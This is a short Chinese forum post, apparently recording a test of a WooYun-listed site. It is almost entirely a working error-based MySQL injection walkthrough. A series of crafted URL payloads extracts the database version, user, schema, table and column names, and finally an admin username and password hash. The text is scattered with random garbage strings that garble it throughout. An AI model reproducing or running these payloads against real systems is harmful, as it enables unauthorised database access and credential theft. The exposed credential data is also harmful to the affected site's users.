http://www.wooyun.org/bugs/wooyun-2010-01666
! s* N! \' t4 d7 W, B, P! w) \" N
之前想找个测试 没想到这有 可以测试下做个记录而已
. D1 U- B0 a7 ~( v" Q2 k/ f
* m& l* l) F6 N, _6 Ghttp://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_0034 Q# h- t" Q$ g1 K; B4 X. N
3 E' F* i: K- E0 r! v/data0/htdocs/leqi_new/app/myapp.php0 h! u+ u4 c5 M4 j+ A& [. b
或者
: e2 \6 C& V8 @( Q s. P
/**********version()**********/ 5.1.49-log
0 d' R0 U6 `* L. d0 j6 ?http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
/ V& H0 C) Y% q* m; b
/**********user()**********/
- |3 W- a! e; x+ @http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
. }; i* l, k1 K }9 j, s1 ?
2 x& k" Q" m6 w3 z% q5 _; h2 Z: e/**********database()**********/ leqi+ [3 _: ]" f3 Z, a: Q4 o/ ~
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
+ U0 r( R2 q6 q- A. P6 s% |5 V4 ?# i; b/ y# d
/**********limit依次递归爆库**********/
7 j X; z& F! ^( H2 k( O1 y- _http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0032 k6 u: f4 x5 T2 B* n8 h H
information_schema
3 I0 j, n5 Z2 Fhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
! Q) W& ^. n5 \8 U# K7 U9 ^1 C6 Xleqi
0 u* ~* d+ p2 V/ z8 H4 z; @http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003" C. V( h# }1 j& Y& A4 J" A) P* l
test
4 r1 { Q& Y1 c( a. Q' m4 M f( f! e* o
/**********limit依次递归爆表名**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0036 Q, r; _2 A- r7 _7 V- X9 `
users
5 Y9 Z0 x# P- D) O# X5 U+ w& R3 X" x/ k4 m1 ?
/**********limit依次递归爆字段名**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
" u0 P- k2 v( j& g' xuser_id,username,nickname,passwd,group_id! q" M9 [+ D; H# A Y( S
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23. f$ R+ p2 X* S0 E) Z
/wapc/5000_0005_0035 d; j) w- ^/ s4 X* ]" @2 G1 Q
11 213 `! R1 ]/ ?+ V1 H7 r% t# l) M
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/ g8 \! l% M# ~: N8 r
/wapc/5000_0005_003
1 h" {1 V8 F/ J# M2 i11 341 351 361- l" l& H* R- M* a5 l$ }; w$ o7 O
/**********爆数据**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
& F! L3 D% \- w2 C2 Y- l9 j. x Dadmin a6 r2 T* ` ^3 S9 @ ~! J; U1 A
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
' G" k) B5 l/ d- h) H3 v) A' H2 p6a8b4574ca231eb8bd52764d4978ffcd4 d; c# v* Y! a0 l3 R& ]
* E! u9 I. z8 k6 B1 h' X% k7 F 2 ^+ F7 \5 A+ @
|